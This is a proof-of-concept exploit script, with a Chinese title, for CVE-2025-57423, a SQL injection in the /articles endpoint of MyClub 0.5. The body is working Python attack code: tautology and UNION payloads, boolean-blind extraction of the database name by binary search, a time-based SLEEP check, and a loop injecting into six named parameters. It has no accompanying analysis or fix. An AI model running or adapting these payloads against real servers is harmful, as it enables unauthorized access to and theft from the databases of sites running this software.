CVE-2025-57423 MyClub 0.5 /articles端点SQL注入漏洞

# CVE-2025-57423 - MyClub 0.5 SQL Injection PoC # Vulnerability: SQL Injection in /articles endpoint # Affected parameters: Content, GroupName, PersonName, lastUpdate, pool, title import requests TARGET_URL = "http://target-myclub-server" ARTICLES_ENDPOINT = f"{TARGET_URL}/articles" # PoC 1: Basic SQL Injection test on 'title' parameter def test_sql_injection_title(): """Test SQL injection via the 'title' parameter""" payload = "' OR '1'='1" params = {"title": payload} response = requests.get(ARTICLES_ENDPOINT, params=params) print(f"[+] Title injection response status: {response.status_code}") print(f"[+] Response length: {len(response.text)}") return response # PoC 2: UNION-based SQL Injection to extract database version def union_based_injection(): """UNION-based injection to extract database information""" # Determine number of columns first payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" params = {"title": payload} response = requests.get(ARTICLES_ENDPOINT, params=params) print(f"[+] UNION injection response status: {response.status_code}") if response.status_code == 200: print("[+] Possible SQL injection confirmed!") return response # PoC 3: Boolean-based blind SQL Injection def boolean_blind_injection(): """Boolean-based blind SQL injection to extract data character by character""" result = "" for i in range(1, 50): # Extract database name character by character payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>64-- -" params = {"title": payload} response_true = requests.get(ARTICLES_ENDPOINT, params=params) payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>96-- -" params = {"title": payload} response_false = requests.get(ARTICLES_ENDPOINT, params=params) if len(response_true.text) != len(response_false.text): # Binary search for the exact character low, high = 32, 126 while low <= high: mid = (low + high) // 2 payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>{mid}-- -" params = {"title": payload} resp = requests.get(ARTICLES_ENDPOINT, params=params) if len(resp.text) == len(response_true.text): low = mid + 1 else: high = mid - 1 result += chr(low) print(f"[+] Extracted so far: {result}") else: break return result # PoC 4: Time-based blind SQL Injection def time_based_injection(): """Time-based blind SQL injection using SLEEP""" import time payload = "' OR SLEEP(5)-- -" params = {"title": payload} start_time = time.time() response = requests.get(ARTICLES_ENDPOINT, params=params) elapsed = time.time() - start_time print(f"[+] Time-based injection elapsed: {elapsed:.2f}s") if elapsed >= 5: print("[+] Time-based SQL injection confirmed!") return response # PoC 5: Injection via multiple vulnerable parameters def multi_param_injection(): """Test injection across all vulnerable parameters""" vulnerable_params = ["Content", "GroupName", "PersonName", "lastUpdate", "pool", "title"] payload = "' OR '1'='1' -- -" for param in vulnerable_params: params = {param: payload} response = requests.get(ARTICLES_ENDPOINT, params=params) print(f"[+] Parameter '{param}' - Status: {response.status_code}, Length: {len(response.text)}") if __name__ == "__main__": print("[*] Testing CVE-2025-57423 - MyClub 0.5 SQL Injection") print("[*] Target:", TARGET_URL) print("-" * 60) # Run all PoC tests test_sql_injection_title() union_based_injection() time_based_injection() multi_param_injection() print("\n[*] PoC execution completed.")